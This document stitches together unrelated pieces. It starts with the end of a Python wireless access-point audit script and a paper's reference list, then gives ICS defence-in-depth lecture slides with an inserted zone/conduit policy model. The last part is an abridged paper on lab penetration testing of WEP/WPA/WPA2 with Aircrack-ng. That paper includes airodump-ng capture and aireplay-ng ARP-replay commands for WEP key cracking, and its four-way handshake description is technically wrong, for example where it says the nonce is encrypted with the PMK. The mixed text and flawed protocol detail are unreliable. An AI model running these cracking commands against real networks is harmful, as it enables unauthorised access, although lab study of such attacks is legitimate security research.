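    "firmware": "1.2.0", "tx_power_dbm": 8, "antenna": "directional",
    "mac_filter_enabled": True, "key_age_days": 30, "ssid_broadcast": False,
}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_AP), ("hardened", HARDENED_AP)):
        print(name, audit_ap(cfg, latest_firmware="1.2.0"))
```

The weak configuration trips every check (ten findings, three of them from the password alone), the hardened one returns an empty list. Versions are compared as integer tuples so that "1.10.0" ranks above "1.9.9", a mistake a plain string comparison would make when checking recommendation 4.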

References
Ahmad, N., Wei, L. M., and Jabbar, M. H. (2018). Advanced encryption standard with galois
counter mode using field programmable gate array. In Journal of Physics: Conference Series,
volume 1019, page 012008. IOP Publishing.

Alabady, S. A. (2008). Design and implementation of a network security model using static VLAN and AAA server. In 3rd IEEE International Conference on Information and Communication Technologies: From Theory to Applications, 2008. ICTTA 2008., pages 1–6.

Alabady, S. A. (2009). Design and implementation of a network security model for cooperative
network. International Arab Journal of e-Technology, 1(2):26–36.

Alabady, S. A., Al-Turjman, F., and Din, S. (2020). A novel security model for cooperative virtual networks in the IoT era. International Journal of Parallel Programming, 48(2):280–295.

Alabady, S. A. and Salleh, M. (2013). Overview of wireless mesh networks. Journal of Commu-
nications, 8(9):134–144.


Anitha, G., Nirmala, P., Ramesh, S., Tamilselvi, M., and Ramkumar, G. (2022). A novel data
communication with security enhancement using threat management scheme over wireless mo-
bile networks. In IEEE International Conference on Advances in Computing, Communication
and Applied Informatics (ACCAI), pages 1–6.

Badholia, A., Verma, V., and Kashyap, S. K. (2019). WEP, WAP and WAP2 wireless network security protocol: A compact algorithm (wireless network security protocol). In IEEE International Conference on Computing, Communication, and Intelligent Systems (ICCCIS), pages 239–243.

Baray, E. and Ojha, N. K. (2021). WLAN security protocols and WPA3 security approach measurement through aircrack-ng technique. In 5th IEEE International Conference on Computing Methodologies and Communication (ICCMC), pages 23–30.

Bendale, S. P. and Prasad, J. R. (2018). Security threats and challenges in future mobile wireless
networks. In IEEE Global Conference on Wireless Computing and Networking (GCWCN),
pages 146–150.

Butt, S. A., Diaz-Martinez, J. L., Jamal, T., Ali, A., De-La-Hoz-Franco, E., and Shoaib, M. (2019). IoT smart health security threats. In 19th IEEE International Conference on Computational Science and its Applications (ICCSA), pages 26–31.

Chen, J., Yang, T., He, B., and He, L. (2021). An analysis and research on wireless network
security dataset. In IEEE International Conference on Big Data Analysis and Computer
Science (BDACS), pages 80–83.

Faika, T., Kim, T., Ochoa, J., Khan, M., Park, S.-W., and Leung, C. S. (2019). A blockchain-based internet of things (IoT) network for security-enhanced wireless battery management systems. In IEEE Industry Applications Society Annual Meeting, pages 1–6.

Gupta, A. and Jha, R. K. (2015). Security threats of wireless networks: A survey. In IEEE
International Conference on Computing, Communication and Automation, pages 389–395.

He, D., Li, X., Chan, S., Gao, J., and Guizani, M. (2019). Security analysis of a space-based
wireless network. IEEE Network, 33(1):36–43.

Hoseini, S. A., Bouhafs, F., and den Hartog, F. (2022). A practical implementation of physical
layer security in wireless networks. In IEEE 19th Annual Consumer Communications and
Networking Conference (CCNC), pages 1–4.

Jilani, S. A., Koner, C., and Nandi, S. (2020). Security in wireless sensor networks: attacks
and evasion. In IEEE National conference on emerging trends on sustainable technology and
engineering applications (NCETSTEA), pages 1–5.

Kamrul, H. M., Ghazal, T. M., Saeed, R. A., Pandey, B., Gohel, H., Eshmawi, A., Abdel-Khalek,
S., and Alkhassawneh, H. M. (2022). A review on security threats, vulnerabilities, and counter
measures of 5g enabled internet-of-medical-things. IET Communications, 16(5):421–432.

Kaur, R. and Sandhu, J. K. (2021). A study on security attacks in wireless sensor network.
In IEEE International conference on advance computing and innovative technologies in engi-
neering (ICACITE), pages 850–855.

Lamers, E., Dijksman, R., van der Vegt, A., Sarode, M., and de Laat, C. (2021). Securing home
wi-fi with wpa3 personal. In IEEE 18th Annual Consumer Communications and Networking
Conference (CCNC), pages 1–8.

218
S.A. ALABADY et al. ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING...

Lin, Y. and Chang, J. (2019). Improving wireless network security based on radio fingerprint-
ing. In IEEE 19th International Conference on Software Quality, Reliability and Security
Companion (QRS-C), pages 375–379.

Liu, Y. (2022). Security in wireless networks: Analysis of wi-fi security and attack cases study. In
IEEE International Conference on Artificial Intelligence in Everything (AIE), pages 476–481.

Maesaroh, S., Kusumaningrum, L., Sintawana, N., Lazirkha, D. P., and Dinda, R. (2022).
Wireless network security design and analysis using wireless intrusion detection system. In-
ternational Journal of Cyber and IT Service Management, 2(1):30–39.

Mao, Q., Hu, F., and Hao, Q. (2018). Deep learning for intelligent wireless networks: A com-
prehensive survey. IEEE Communications Surveys and Tutorials, 20(4):2595–2621.

Michael, S. (2002). Hacking the invisible network insecurities in 802.11 x. iAlert White paper,
pages 1–35.

Nazir, R., Laghari, A. A., Kumar, K., David, S., and Ali, M. (2021). Survey on wireless network
security. Archives of Computational Methods in Engineering, pages 1–20.

Pamarthi, S. and Narmadha, R. (2022). Literature review on network security in wireless mobile
ad-hoc network for iot applications: Network attacks and detection mechanisms. International
Journal of Intelligent Unmanned Systems, 10(4):482–506.

Patil, B., Kharade, K., and Kamat, R. (2020). Investigation on data security threats and
solutions. International Journal of Innovative Science and Research Technology, 5(1):79–83.

Wang, L., Yang, J., and Wan, P.-J. (2020). Educational modules and research surveys on critical
cybersecurity topics. International Journal of Distributed Sensor Networks, 16(9):1–18.

Wu, H. and Wu, H. (2021). Research on computer network information security problems and
prevention based on wireless sensor network. In IEEE Asia-Pacific Conference on Image
Processing, Electronics and Computers (IPEC), pages 1015–1018.

Zaman, S., Alhazmi, K., Aseeri, M. A., Ahmed, M. R., Khan, R. T., Kaiser, M. S., and Mahmud,
M. (2021). Security threats and artificial intelligence based countermeasures for internet of
things networks: a comprehensive survey. IEEE Access, 9:94668–94690.

219
UFCF7P-15-M Critical Systems Security

UFCF7P-15-M CRITICAL SYSTEMS SECURITY
Defence-in-depth

RECAP

Intelligence-driven computer network defence

• Kill chain model – the basis of intelligence-driven computer network defence

• Kill chain analysis illustrates that the adversary must progress successfully through each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the chain and the adversary [1].

• Objectives:
– Identify phases of intrusion.
– Map adversary kill chain indicators to defender courses of action.
– Identify patterns that link individual intrusions into broader campaigns.
– Understand the iterative nature of intelligence.
Indicators and the indicator life cycle

• The fundamental element of intelligence in the Cyber Kill Chain model is the indicator; any piece of information that objectively describes an intrusion.

• Three indicator types:
– Atomic
– Computed
– Behavioural

Atomic indicators

• Atomic indicators are those which cannot be broken down into smaller parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and vulnerability identifiers.

Examples: [email protected], 192.168.1.5, CVE-1999-0067

More on CVE: https://cve.mitre.org/

Computed indicators

• Computed indicators are those which are derived from data involved in an incident.
• Common computed indicators include hash values and regular expressions.

Behavioural indicators

• Behavioural indicators are collections of computed and atomic indicators, often subject to qualification by quantity and possibly combinatorial logic.
• Example: “the intruder would initially use a backdoor which generated network traffic matching [regular expression] at the rate of [some frequency] to [some IP address], and then replace it with one matching the [MD5 hash value] once access was established”
ICS Cyber kill chain model: Stage 1

ICS Cyber kill chain model: Stage 2

This week

• ICS Security Architecture
• Network segmentation
• Boundary protection
• Firewalls
• Network segregation
• Defence-in-depth
• ISA/IEC 62443-3-2
• In the tutorial
ICS Security Architecture

• Separate the corporate network from the ICS network.
• If the networks must be connected, only minimal (single if possible) connections should be allowed, and the connection should pass through a firewall and a DMZ.

Network segmentation and segregation

• Operational risk analysis should be performed to determine critical parts of the ICS network and define segmentation (partitioning the network into smaller networks).
• Segmentation establishes security domains, typically defined as being managed by the same authority, enforcing the same policy, and having a uniform level of trust.
• Goal: Minimise access to sensitive information, ICS communication and equipment configuration.

Network segmentation and segregation

• Traditionally, network segmentation and segregation is implemented at the gateway between domains.

[Figure: gateways between the Internet, corporate LANs, control LANs, operational LANs and operational DMZs]
Network segmentation and segregation

Common technologies and methods:

• Logical network separation enforced by encryption or network device-enforced partitioning (VLANs, VPNs, unidirectional gateways).
• Physical network separation to completely prevent any interconnectivity of traffic between domains.
• Network traffic filtering, using a variety of technologies at various network layers to enforce security requirements and domains (e.g. filtering based on IP, port and/or protocol, or at the application layer).

Defence in depth

• Deploy multiple layers of protection
• Redundancy in case a security measure fails
• Make the attacker’s life difficult!

Network segmentation and segregation - Defence in depth

Four common themes that implement the concept of defense-in-depth by providing for good network segmentation and segregation:

1) Apply technologies at more than just the network layer.
2) Use the principles of least privilege and need-to-know.
3) Separate information and infrastructure based on security requirements.
4) Implement whitelisting instead of blacklisting.
Boundary protection (data transactions between network segments)

Control the flow of information between interconnected security domains.

Boundary protection controls include: gateways, routers, firewalls, DMZs, network-based malicious code analysis and virtualisation systems, intrusion detection systems (network and host-based), encrypted tunnels, managed interfaces, mail gateways, and unidirectional gateways (e.g. data diodes).

Boundary protection devices determine whether data transfer is permitted, often by examining the data or associated metadata.

Boundary protection (data transactions between network segments)

• A common architectural construct is the DMZ; a host or network segment inserted as a “neutral zone” between security domains.
• Deny communications traffic by default and allow communications traffic by exception (white-listing policy).
• Limit direct connectivity by implementing proxy servers that act as an intermediary for external domains requesting information system resources (e.g., files, connections, or services) from the ICS domain.
• Deep packet inspection firewalls and XML gateways.
Boundary protection (data transactions between network segments)

• Allow communication only between authorised and authenticated source and destination address pairs.
• Extending the DMZ concept to other separate subnetworks is useful, for instance isolating ICS to prevent adversaries from discovering the analysis and forensics techniques of organisations.
• Enforce physical access control to limit authorised access to ICS components.
• Conceal network addresses of ICS components from discovery (e.g., network address not published or entered in domain name systems), requiring prior knowledge for access.

Boundary protection (data transactions between network segments)

• Disable control and troubleshooting services and protocols, especially those employing broadcast messaging, which can facilitate network exploration.
• Disable feedback (e.g., non-verbose mode) to senders when there is a failure in protocol format validation, to prevent adversaries from obtaining information.
• Implement one-way data flow, especially between different security domains.
• Establish passive monitoring of ICS networks to actively detect anomalous communications and provide alerts.

Boundary protection (data transactions between network segments)

Network and ICS security architects must decide:

• which domains are to be permitted direct communication,
• the policies governing permitted communication,
• the devices to be used to enforce the policy, and
• the topology for provisioning and implementing these decisions, which are typically based on the trust relationship between domains.
Firewalls

• Not just for the connection to the Internet.
• Restrict ICS inter-subnetwork communications; prevent unauthorised access to the respective systems and resources within the more sensitive areas.

Types of Firewalls:
- Packet Filtering Firewalls
- Stateful Inspection Firewalls
- Application-Proxy Gateway Firewalls
Network segregation

Network segregation

Dual-Homed Computer/Dual Network Interface Cards (NIC)

• No systems other than firewalls should be configured as dual-homed to span both the control and corporate networks.
• All connections between the control network and the corporate network should be through a firewall.
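The boundary-protection slides above (authorised source/destination pairs, deny-by-default with allow-by-exception, the architects' decision of which domains may talk directly) and the dual-homed rule on this slide can be made concrete in one small policy model. The code below is an added example written for this page, not material from the lecture or from NIST SP 800-82 or IEC 62443; the zone names, subnets, conduits, flow records and host inventory are constructed sample data. A flow is allowed only if a conduit exists for its direction, hosts, protocol and port; everything else is denied. The audit function then flags any non-firewall host whose interfaces land in more than one zone, which is exactly the dual-homed bypass the slide forbids.

```python
"""Zone/conduit policy evaluation and dual-homed host audit for an ICS network.
Added example, not from the lecture slides or any standard. The zones, subnets,
conduits and host inventory below are constructed sample data."""
from collections import namedtuple
from ipaddress import ip_address, ip_network

# Security zones (uniform trust, one policy owner) mapped to address space.
ZONES = {
    "corporate": [ip_network("10.10.0.0/16")],
    "dmz":       [ip_network("10.20.0.0/24")],
    "control":   [ip_network("192.168.100.0/24")],
}

# A conduit is the only sanctioned path between two zones: direction, hosts,
# protocol and port. A host of None means "any host in that zone".
Conduit = namedtuple("Conduit", "src_zone dst_zone src_host dst_host proto dport")
CONDUITS = [
    Conduit("corporate", "dmz", None, "10.20.0.5", "tcp", 443),  # users read the DMZ historian
    Conduit("dmz", "control", "10.20.0.5", None, "tcp", 502),    # only the historian polls PLCs
]


def zone_of(ip: str):
    """Name of the zone containing ip, or None if it is outside every zone."""
    addr = ip_address(ip)
    for name, nets in ZONES.items():
        if any(addr in net for net in nets):
            return name
    return None


def decide(src: str, dst: str, proto: str, dport: int):
    """Default-deny: a cross-zone flow is allowed only if a matching conduit exists."""
    sz, dz = zone_of(src), zone_of(dst)
    if sz is None or dz is None:
        return "deny", "address outside every defined zone"
    if sz == dz:
        return "allow", f"intra-zone {sz}"
    for c in CONDUITS:
        if (c.src_zone, c.dst_zone, c.proto, c.dport) != (sz, dz, proto, dport):
            continue
        if c.src_host not in (None, src) or c.dst_host not in (None, dst):
            continue
        return "allow", f"conduit {sz}->{dz} {proto}/{dport}"
    return "deny", f"no conduit {sz}->{dz} {proto}/{dport}"


# Constructed flow records: (src, dst, proto, dport)
SAMPLE_FLOWS = [
    ("10.10.1.7", "10.20.0.5", "tcp", 443),        # corporate -> DMZ historian: allowed
    ("10.10.1.7", "192.168.100.20", "tcp", 502),   # corporate -> PLC directly: denied
    ("10.20.0.5", "192.168.100.20", "tcp", 502),   # historian -> PLC: allowed
    ("10.20.0.9", "192.168.100.20", "tcp", 502),   # other DMZ host -> PLC: denied
    ("192.168.100.20", "10.20.0.5", "tcp", 502),   # reverse direction: denied
    ("203.0.113.9", "10.20.0.5", "tcp", 443),      # address in no zone: denied
]


def audit_flows(flows):
    """Return each flow paired with its verdict."""
    return [(f, decide(*f)[0]) for f in flows]


# Constructed host inventory: name -> (role, interface addresses)
INVENTORY = {
    "fw-01":     ("firewall",    ["10.10.0.1", "10.20.0.1", "192.168.100.1"]),
    "eng-ws-03": ("workstation", ["10.10.4.12", "192.168.100.50"]),
    "historian": ("server",      ["10.20.0.5"]),
    "plc-07":    ("plc",         ["192.168.100.7"]),
}


def dual_homed_violations(inventory):
    """Non-firewall hosts whose interfaces sit in more than one zone: such a host
    bridges the zones and bypasses the boundary device."""
    findings = []
    for host, (role, addrs) in inventory.items():
        zones = sorted({z for z in map(zone_of, addrs) if z is not None})
        if role != "firewall" and len(zones) > 1:
            findings.append((host, zones))
    return findings


if __name__ == "__main__":
    for flow, verdict in audit_flows(SAMPLE_FLOWS):
        print(verdict, flow)
    print("dual-homed:", dual_homed_violations(INVENTORY))
```

Feeding real flow records into `decide` (for example from firewall logs) turns the conduit table into a check that the deployed rules match the designed zones; any "allow" the firewall granted that this model denies is a rule to review.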
Defence-in-depth

• Multiple layer strategy involving two (or more) different overlapping security mechanisms.
• A defense-in-depth architecture strategy includes the use of firewalls, the creation of demilitarised zones and intrusion detection capabilities, along with effective security policies, training programs, incident response mechanisms and physical security.
• Also requires a thorough understanding of possible attack vectors on an ICS.

Defence-in-depth

ISA/IEC 62443

• ISA and IEC have developed the IEC 62443 series of standards to address the need to design cybersecurity robustness and resilience into industrial automation control systems (IACS).
• Provides the detailed information to implement a cyber-security program.
• https://www.isa.org/training-and-certifications/isa-certification/isa99iec-62443/isa99iec-62443-cybersecurity-certificate-programs/?utm_medium=social&utm_campaign=smm-training-ISA-IEC-62443-Cybersecurity-Certificate-Programs&utm_source=twitter

ISA/IEC 62443

ISA/IEC 62443-3-2: Security Risk Assessment and System Design

• Includes the zone and conduit requirements (network segmentation and aggregation).
• You can find it in the reading list. Alternatively, you can download it from UWE’s Library online webpage.

In the tutorial…

• NIST 800-82, Section 5.2 Boundary Protection
• SANS 401 Network Model
• Design defence-in-depth for an ICS.
• Attack Vectors,
• Attack Trees,
• Kill Chain

References

Chapter 5 from: https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final

IEC/ISA 62443-3-2
ResearchGate: https://www.researchgate.net/publication/342283555

Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux Hacking Tools

Article in International Journal of Computer Applications · June 2020
DOI: 10.5120/ijca2020920365

Authors: Michael Kyei Kissi (University of Media, Arts and Communication (UniMAC)); Michael Asante (Kwame Nkrumah University of Science and Technology)

Uploaded by Michael Kyei Kissi on 10 July 2020.

International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux Hacking Tools

Michael Kyei Kissi, Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana
Michael Asante, PhD, Department of Computer Science, Kwame Nkrumah University of Science and Technology, Kumasi, Ghana
ABSTRACT
The use of wireless networks as a medium of communication has tremendously increased due to their flexibility, mobility and easy accessibility. Their usage is inevitable at hotels and restaurants, airports and organizations, and is currently predominant in homes. As a large number of devices connect to wireless networks, valuable and sensitive information is shared among users in the open air, and attackers can easily sniff and capture data packets. This paper aims at using penetration testing to assess vulnerabilities and conduct attacks on the Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and 802.11i (WPA2) security protocols. The penetration testing was conducted using Kali Linux with its Aircrack-ng tools.

Keywords
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, WLAN, Wireless, Penetration Testing, Encryption, Security.

1. INTRODUCTION
Wireless networking in today’s communication technology is tremendously increasing due to the benefits it provides, such as flexibility, mobility and easier accessibility. Most hotels and restaurants, coffee shops, airports, organizations and institutions currently provide open or secured wireless connectivity. Nevertheless, wireless networks can also be seen in homes [1]. The IEEE 802.11 Wireless Local Area Network (WLAN) has evolved to be the easiest and best-known network technology to set up since its inception. Its popularity is a result of the use of a Local Area Network (LAN), lower expense, and easy setup, installation and configuration procedures [2]. The availability of WLAN menaces the security of the network infrastructure, causing challenges for network administrators as well as the organization. A WLAN signal travels beyond the boundaries of a specified area, as compared to a wired network [3]. [4] noted that the wireless medium is shared among its users in the open air; attackers can easily sniff and capture data packets. A WLAN may suffer attacks and damages such as system compromise, data theft and Denial of Service (DoS), among others [5]. This study presents a security assessment of WLAN using penetration testing tools to examine and exploit identified vulnerabilities in WLAN security protocols. The penetration testing framework used for the testing was based on that of the National Institute of Standards and Technology (NIST) [6]. The framework involves four phases, namely the Planning Phase, Discovery Phase, Attack Phase and Reporting Phase.

2. LITERATURE REVIEW
The IEEE 802.11 gives a criterion for WLAN communications among devices [7]. The IEEE in 1997 developed the 802.11 standard, which is a subset of the 802 standards. The 802 handles the Local and Metropolitan Area Network (MAN) whilst the suffix .11 handles the WLAN [3]. The 802.11 is governed by a set of rules or protocols to aid propagation of wireless signals and communication across the wireless network. The 802.11 employs Carrier Sense Multiple Access (CSMA) and the Medium Access Control (MAC) protocol with Collision Avoidance (CA). There are versions of the standard which can be recognized by one or two ending alphabetic characters; these are 802.11a, 802.11b, 802.11g, 802.11n and 802.11ac [8]. The most common and widely used among the standards are 802.11a, 802.11b and 802.11g [7].

2.1 Attacks on WLAN
WLAN uses Radio Frequency (RF) or Infrared transmission technology for connectivity among devices, making it susceptible to attacks. Attacks on wireless networks aim at breaching the integrity and confidentiality of the network, its availability and needed information. These attacks are categorized into Passive and Active Attacks.
Passive attack: Network traffic is silently eavesdropped or monitored by an attacker, who waits until a client seeks to connect with the Access Point (AP) or searches for the network Service Set Identifier (SSID); as a result the attacker obtains the SSID in plaintext. An attacker can intercept data transmitted through the network by means such as Traffic Analysis, Packet Sniffing, War-Driving and Port Scanning. These types of attacks are usually difficult to detect since the attacker does not modify the content or information [9].
Active attack: The attacker does not only gain access to information but can make changes to the network information and even inject fraudulent packets into the network. An attacker can initiate commands to disrupt the usual operations of the network, such as Denial of Service (DoS), Session Hijacking, Brute Force Attack, Replay Attack, and Man in the Middle (MITM) attack [9] [10].

2.2 WLAN Security
The WLAN protocols outlined by the IEEE comprise three security standards; these are Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) [11]. [12] stated that WLAN security protocols were designed to protect the network from several breaches due to the susceptibility of Wi-Fi transmission signals, which have no limited boundaries and hence are prone to illegitimate access. According to [13], a secured WLAN must have five key requirements, namely Authentication, Access Control, Confidentiality, Non-Repudiation and Data Integrity. In spite of this, WLAN security is prone to threats such as Eavesdropping and traffic analysis, Denial of Service, Masquerade, forged packets and
among others.

2.3 Wired Equivalent Privacy (WEP)
The IEEE 802.11 developed WEP in 1999 to endow security for wireless networks comparable to the wired [3]. The WEP encryption is based on the RC4 symmetric stream cipher with 40-bit and 104-bit encryption keys [7]. WEP involves two parameters: an Initialization Vector (IV), which is a three (3) byte value, and a shared WEP Key of hexadecimal digits for encryption and decryption. WEP appends a 32-bit Cyclic Redundancy Check (CRC) checksum to each transmitted data frame. The 24-bit IV, which is randomly selected, is sent together with the secret key to RC4 to produce a keystream. The plaintext is XORed with the RC4 keystream to create a cipher text, as illustrated in figure 1.

Figure 1: WEP Data Frame Encryption [14]

According to [15], WEP decrypts received data frames by regenerating the keystream using RC4 (IV and shared key), which is then XORed with the cipher text to retrieve the plaintext. A new checksum is computed and compared with the received checksum. The plaintext is accepted if the two checksums are equal, as shown in figure 2.

Figure 2: WEP Data Frame Decryption [14]

2.3.1 Weakness and Vulnerabilities in WEP
WEP uses the RC4 algorithm and a secret key to provide access control and confidentiality, and the CRC checksum for data integrity [15]. Despite these security control mechanisms, the WEP security protocol has vulnerabilities and can be exploited by attackers.

2.3.1.1 Short IV Size and Keystream Reuse
The IV has a size of 24 bits, giving 16,777,216 different RC4 cipher streams for a given WEP key, and is transmitted in clear text with each packet [16]. The IV is used to alter the keystream: when the IV value changes, so does the keystream. As more traffic is sent, unique IVs can no longer be generated after transmitting 2^24 packets; hence there is a possibility of IVs repeating (reuse) because the 24-bit space will be exhausted.

2.3.1.2 Integrity Check Value (ICV) Insecurity
The purpose of the ICV or CRC checksum is to safeguard packets in transit, preventing attackers from altering the packets [17]. The CRC is a linear function, which means an attacker can modify encrypted messages and fix the ICV to obtain a message that appears genuine. An attacker with a valid keystream can create arbitrary messages, compute the checksum and encrypt it using the keystream, since WEP allows IV reuse [18].

2.3.1.3 No Mutual Authentication
WEP authentication is client-centered or one-way authentication. The AP cannot prove its identity to the client; only the AP authenticates the client, since the WEP Key is configured on the AP [19].

2.3.1.4 Forged Authentication Messages
An attacker eavesdrops and monitors packets transmitted in order to uncover the RC4 keystream used for encryption [20]. The stream obtained is used to encrypt any challenge received, so an attacker can forge a valid authentication packet out of the keystream.

2.3.2 Attacks on WEP

2.3.2.1 Chopchop Attack
The Chopchop attack decrypts the entire WEP packet without knowing the WEP Key. An attacker decrypts the last n bytes of plaintext of an encrypted packet by sending an average of n*128 packets on the network [21]. The Chopchop attack exploits the vulnerability of the 4-byte checksum used for the integrity of the encrypted packets [22].

2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack
The FMS attack is a statistical attack discovered by Fluhrer, Mantin and Shamir. The attack is a result of the use of weak Initialization Vectors (IVs) in the RC4 algorithm [23]. [24] describes the “weak” IVs as having a structure of B+3::ff:X (where B is the byte of the key, ff is the constant value 255, and X is irrelevant). The attacker can determine the value of B by using the information of the plaintext found in the headers of certain packets, like the Address Resolution Protocol (ARP) packets [25].

2.3.2.3 ARP Replay Attack
IVs are freely reused and there is no sequence number to validate replayed packets; this gives room for an attacker to generate more packets from the captured packets [26]. ARP Request packets are easily identified based on the destination MAC address and fixed size. The attacker sniffs ARP Request packets from a legitimate host and keeps replaying that ARP Request; the host responds with ARP Responses, and therefore more traffic is generated. When enough data packets with weak IVs are collected, the WEP Key is easily cracked within a short period.

2.4 Wi-Fi Protected Access (WPA)
The Wi-Fi Alliance created WPA in 2003 to address the existing vulnerabilities and flaws in WEP [20]. WPA improves data encryption using a hashing algorithm called Temporal Key Integrity Protocol (TKIP), which scrambles the keys and adds an integrity check feature to prevent tampering with the encrypted keys [20]. TKIP uses the same RC4 encryption algorithm as WEP but uses a hash value to determine the uniquely generated temporal key for each packet traversed. TKIP makes use of a Message Integrity Code (MIC) for integrity checking instead of the ICV used with WEP. This prevents attackers from injecting data into a packet to find the keystream used to encrypt the data [27]. It also uses sequence counters to prevent replay attacks, which improves the integrity check.

2.5 Wi-Fi Protected Access 2 (WPA 2)
The Wi-Fi Alliance improved WPA in 2004 by designing 802.11i (WPA2), which uses the concept of the Robust Security Network (RSN) [20] [10]. It tackles three key security areas, namely Data Transfer Privacy, Authentication and Key Management [28]. WPA2 uses the Advanced Encryption Standard (AES) in the Counter Mode Cipher Block Chaining Message Authentication Code (CBC-MAC) protocol (CCMP) for data encryption [29] [30]. CCMP was created as part of the 802.11 security for 802.11i (WPA2) to replace WEP and TKIP [10]. AES uses the Rijndael algorithm, a block cipher using a 128-bit, 192-bit or 256-bit key. AES permits the use of a single encryption key for all packets, which removes the challenges associated with key scheduling and key distribution related to the WEP and TKIP protocols [31].

2.5.1 WPA/WPA2-PSK Four-Way Handshake
WPA/WPA2 uses dynamic per-packet keys generated from the Pairwise Master Key (PMK). According to [32], the four-way handshake provides mutual authentication based on the PMK, and agrees on a fresh session key known as the Pairwise Transient Key (PTK). The four-way handshake consists of an exchange of four packets (messages) between the client (Supplicant) and the AP (Authenticator). The PMK is generated by using the hashing algorithm PBKDF2, which requires the following inputs:

PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)

Where:
Passphrase: The passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
SSIDlen: the length of the SSID
4096: Number of hashing iterations (through the SHA1 algorithm)
256: Intended key length of the PSK

The PTK, which is a dynamic key, is produced during the four-way handshake at authentication. The PMK and two nonces are used to create the PTK when the connection happens [33].

PTK = Function (PMK, Authenticator Nonce (ANonce), Supplicant Nonce (SNonce), Authenticator MAC, Supplicant MAC)

Where,

PMK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)

PTK = Function ((Passphrase, SSID, ssidLen, 4096, 256), ANonce, SNonce, Authenticator MAC, Supplicant MAC)

Messages exchanged in the four-way handshake are defined using Extensible Authentication Protocol over LAN (EAPOL) frames. The EAPOL-Key frames contained in the four-way handshake are used for the purpose of key exchange and negotiation [34]. The four-way handshake between the supplicant and authenticator starts after the generation of the PMK. Figure 3 shows an illustration of the generation of the four-way handshake and installation of the PTK.

1. Authenticator to Supplicant
The Authenticator (AP) generates a long arbitrary value called the Authenticator Nonce (ANonce), then encrypts it using the PMK (unknown to the supplicant) for the generation of the PTK at the supplicant station.

2. Supplicant to Authenticator
The supplicant replies to the received message from the authenticator by generating its own long random value, called the Supplicant Nonce (SNonce). The ANonce, SNonce and PMK are used to generate the PTK by the supplicant. A MIC is generated using a cryptographic hash (HMAC-SHA1) for integrity checking of the key installed on the supplicant side.

3. Authenticator to Supplicant
When the AP receives the second message, the PMK is used to decrypt it and acquire the SNonce and MIC. The AP uses the received MIC to check for data integrity. The AP also derives its PTK using the same inputs and installs it if the MIC value is valid.

4. Supplicant to Authenticator
Both supplicant and AP check whether the PTKs are equal by decrypting the third message. The supplicant installs the PTK for encrypted unicast transmission and the Group Transient Key (GTK) for broadcast or multicast transmission.

Figure 3: Generation of WPA/WPA2 Four-way Handshake [33]

2.5.2 Weakness and Vulnerabilities in WPA/WPA2
All values needed to compute the PTK from the PMK are transmitted unencrypted in the four-way handshake. The PTK is a temporary key used in order not to broadcast the PMK and relevant information from the four-way handshake. The weakness in WPA-PSK is a result of the PMK [14]. The PMK is derived by using the hashing algorithm PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256). The attacker uses the PBKDF2 algorithm by inserting the SSID, an own-generated passphrase and the SSID length to compute a hashed key and compares it with the captured hashed key. The attacker succeeds if the two hash values match; hence, the valid passphrase is obtained. Information such as the Client and AP MAC addresses, ANonce, SNonce and MIC value is transmitted in clear text and, together with the PMK, is used to generate the PTK. An attacker can use brute force techniques and dictionary attacks to discover or crack the WPA Key [10] [14] [35]. If the password exists in the attacker’s dictionary or wordlist, the WPA key will be successfully cracked.

2.5.3 Attack on WPA/WPA2
WPA/WPA2 is vulnerable to attacks against the four-way handshake and encryption protocol [36]. PTK generation is based on the PMK, Authenticator MAC, Supplicant MAC and nonces. With the exception of the PMK, the other parameters are transmitted in plaintext throughout the four-way handshake. The only value unknown to the attacker in computing the PMK is the passphrase (PSK), which can be guessed correctly by an attacker carrying out a dictionary attack with a valid captured four-way handshake. The passphrase will be known to the attacker if it exists in the dictionary or wordlist [14] [37].

3. METHODOLOGY
The chosen environment for performing the assessment and penetration testing was to set up a WLAN infrastructure as an experimental network laboratory. The study chose to use
International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

the network laboratory in order not compromise any


individual or organization network due to privacy and legality
of user information.

3.1 Laboratory Experiment Setup and Requirements
The experiment required an Authenticator (wireless router), an external wireless adapter and two laptops (one as the PenTester PC and the other as the supplicant; the supplicant could be any device with wireless connectivity). Figure 4 illustrates the connections between the devices used.

Figure 4: Setup for Penetration Testing

3.2 Exploiting Vulnerabilities in IEEE 802.11 WEP Security Protocol
Three vulnerabilities were discovered and exploited in the IEEE 802.11 WEP security protocol through the penetration testing conducted.

3.2.1 No Replay Protection Mechanism in WEP
Packets were repeatedly replayed into the network to generate more packets with weak IVs. The IVs are weak because the IV space is short and easily exhausted, resulting in reuse of IVs. The following steps indicate how the vulnerability was exploited.

The command "airodump-ng wlan0mon" was used to discover the wireless network and to sniff and capture data packets. wlan0mon is the monitor-mode interface of the wireless card; the targeted AP has the MAC address 98:FC:11:EE:41:25. Sniffed and captured data packets were saved to a file called arp-test using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test wlan0mon", as shown in figure 5.

Figure 5: Capture of Data Packets on Targeted Access Point

The command "aireplay-ng --arpreplay -e SecurityTest wlan0mon" was used to detect ARP Request packets to be replayed so that the AP would send ARP Response packets, enabling the attacker to generate more packets. Figure 6 shows that data packets (59 packets) were received but no ARP Request packet was detected, because of the attacker's MAC address (00:C0:CA:83:01:CD).

Figure 6: Detection of ARP Request Packets

